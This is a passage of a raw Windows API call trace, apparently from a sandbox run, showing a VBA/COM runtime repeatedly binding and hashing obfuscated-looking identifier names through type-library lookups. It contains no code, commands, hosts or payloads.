IUnknown:Release (This=0x631b4c0) returned 0xb [0068.808] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.808] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HUAGAo", lHashVal=0x10f648, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.808] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.808] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.808] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HUAGAo", lHashVal=0x10f648, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.808] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.808] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.808] IUnknown:Release (This=0x665ba50) returned 0xd [0068.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc271a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_HUAGAo") returned 14 [0068.808] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HUAGAo", lHashVal=0x10f648, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0068.808] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60dea | out: _Dst=0x144ec0) returned 0x0 [0068.808] ITypeComp:RemoteBind (in: This=0x665ba60, szName="G4U1ck", lHashVal=0x10921c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60dc2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="G4U1ck") returned 7 [0068.809] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="G4U1ck", lHashVal=0x10921c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60dc2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="G4U1ck") returned 7 [0068.809] ITypeComp:RemoteBind (in: This=0x665bd30, szName="G4U1ck", lHashVal=0x10921c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.809] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="G4U1ck") returned 0x10921c [0068.809] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="G4U1ck" | out: _Dst="G4U1ck") returned 0x0 [0068.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="G4U1ck") returned 7 [0068.809] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.809] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="G4U1ck", lHashVal=0x10921c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.809] IUnknown:Release (This=0x665ba50) returned 0xd [0068.809] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.809] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="G4U1ck", lHashVal=0x10921c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.809] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.809] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.809] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="G4U1ck", lHashVal=0x10921c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.809] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.809] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.809] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="G4U1ck", lHashVal=0x10921c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.809] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60dc2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="G4U1ck") returned 7 [0068.809] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="G4U1ck", lHashVal=0x10921c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.809] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.809] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60dc2 | out: _Dst=0x67c2d40) returned 0x0 [0068.809] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_G4U1ck") returned 0x100c86 [0068.809] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_G4U1ck" | out: _Dst="_B_var_G4U1ck") returned 0x0 [0068.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_G4U1ck") returned 14 [0068.809] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.809] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_G4U1ck", lHashVal=0x100c86, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.809] IUnknown:Release (This=0x665ba50) returned 0xd [0068.809] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.809] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_G4U1ck", lHashVal=0x100c86, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.810] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.810] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.810] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_G4U1ck", lHashVal=0x100c86, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.810] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.810] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.810] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_G4U1ck", lHashVal=0x100c86, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.810] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.810] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.810] IUnknown:Release (This=0x665ba50) returned 0xd [0068.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc274a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_G4U1ck") returned 14 [0068.810] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_G4U1ck", lHashVal=0x100c86, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x63003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x63003100000000, pDummy=0x0) returned 0x0 [0068.810] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60dc2 | out: _Dst=0x144ec0) returned 0x0 [0068.810] IMalloc:Realloc (This=0x7fefec05380, pv=0x62b9100, cb=0x1000) returned 0x6843080 [0068.810] ITypeComp:RemoteBind (in: This=0x665ba60, szName="Y_AA4DUA", lHashVal=0x10c64e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60e12, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="Y_AA4DUA") returned 9 [0068.810] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="Y_AA4DUA", lHashVal=0x10c64e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60e12, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="Y_AA4DUA") returned 9 [0068.810] ITypeComp:RemoteBind (in: This=0x665bd30, szName="Y_AA4DUA", lHashVal=0x10c64e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.810] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Y_AA4DUA") returned 0x10c64e [0068.810] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="Y_AA4DUA" | out: _Dst="Y_AA4DUA") returned 0x0 [0068.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="Y_AA4DUA") returned 9 [0068.810] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.810] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="Y_AA4DUA", lHashVal=0x10c64e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.810] IUnknown:Release (This=0x665ba50) returned 0xd [0068.810] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.810] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="Y_AA4DUA", lHashVal=0x10c64e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.810] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.810] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.810] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="Y_AA4DUA", lHashVal=0x10c64e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.810] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.810] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.810] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="Y_AA4DUA", lHashVal=0x10c64e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.811] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60e12, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="Y_AA4DUA") returned 9 [0068.811] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="Y_AA4DUA", lHashVal=0x10c64e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.811] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.811] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a60e12 | out: _Dst=0x67c2d40) returned 0x0 [0068.811] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Y_AA4DUA") returned 0x109dd7 [0068.811] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="mBGAwU", cchCount1=-1, lpString2="_B_var_Y_AA4DUA", cchCount2=-1) returned 3 [0068.811] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_Y_AA4DUA" | out: _Dst="_B_var_Y_AA4DUA") returned 0x0 [0068.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_Y_AA4DUA") returned 16 [0068.811] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.811] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_Y_AA4DUA", lHashVal=0x109dd7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.811] IUnknown:Release (This=0x665ba50) returned 0xd [0068.811] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.811] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_Y_AA4DUA", lHashVal=0x109dd7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.811] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.811] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.811] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_Y_AA4DUA", lHashVal=0x109dd7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.811] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.811] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.811] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_Y_AA4DUA", lHashVal=0x109dd7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.811] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.811] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.811] IUnknown:Release (This=0x665ba50) returned 0xd [0068.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc277a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_Y_AA4DUA") returned 16 [0068.811] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_Y_AA4DUA", lHashVal=0x109dd7, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0) returned 0x0 [0068.811] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a60e12 | out: _Dst=0x144ec0) returned 0x0 [0068.811] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YADA1A", lHashVal=0x106af4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60e3e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YADA1A") returned 7 [0068.811] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YADA1A", lHashVal=0x106af4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60e3e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YADA1A") returned 7 [0068.811] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YADA1A", lHashVal=0x106af4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.811] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YADA1A") returned 0x106af4 [0068.812] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="YADA1A" | out: _Dst="YADA1A") returned 0x0 [0068.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="YADA1A") returned 7 [0068.812] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.812] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YADA1A", lHashVal=0x106af4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.812] IUnknown:Release (This=0x665ba50) returned 0xd [0068.812] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.812] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YADA1A", lHashVal=0x106af4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.812] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.812] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.812] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YADA1A", lHashVal=0x106af4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.812] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.812] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.812] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YADA1A", lHashVal=0x106af4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.812] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60e3e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YADA1A") returned 7 [0068.812] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YADA1A", lHashVal=0x106af4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.812] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.812] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60e3e | out: _Dst=0x67c2d40) returned 0x0 [0068.812] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YADA1A") returned 0x10e59d [0068.812] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_YADA1A" | out: _Dst="_B_var_YADA1A") returned 0x0 [0068.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_YADA1A") returned 14 [0068.812] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.812] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YADA1A", lHashVal=0x10e59d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.812] IUnknown:Release (This=0x665ba50) returned 0xd [0068.812] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.812] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YADA1A", lHashVal=0x10e59d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.812] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.812] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.812] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YADA1A", lHashVal=0x10e59d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.812] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.812] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.812] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YADA1A", lHashVal=0x10e59d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.812] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.812] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.812] IUnknown:Release (This=0x665ba50) returned 0xd [0068.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc27aa, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_YADA1A") returned 14 [0068.812] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YADA1A", lHashVal=0x10e59d, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0) returned 0x0 [0068.812] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60e3e | out: _Dst=0x144ec0) returned 0x0 [0068.813] ITypeComp:RemoteBind (in: This=0x665ba60, szName="UQAABkG", lHashVal=0x10d1d0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60e66, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="UQAABkG") returned 8 [0068.813] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="UQAABkG", lHashVal=0x10d1d0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60e66, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="UQAABkG") returned 8 [0068.813] ITypeComp:RemoteBind (in: This=0x665bd30, szName="UQAABkG", lHashVal=0x10d1d0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.813] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UQAABkG") returned 0x10d1d0 [0068.813] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="UQAABkG" | out: _Dst="UQAABkG") returned 0x0 [0068.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="UQAABkG") returned 8 [0068.813] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.813] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="UQAABkG", lHashVal=0x10d1d0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.813] IUnknown:Release (This=0x665ba50) returned 0xd [0068.813] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.813] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="UQAABkG", lHashVal=0x10d1d0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.813] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.813] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.813] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="UQAABkG", lHashVal=0x10d1d0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.813] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.813] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.813] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="UQAABkG", lHashVal=0x10d1d0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.813] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60e66, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: 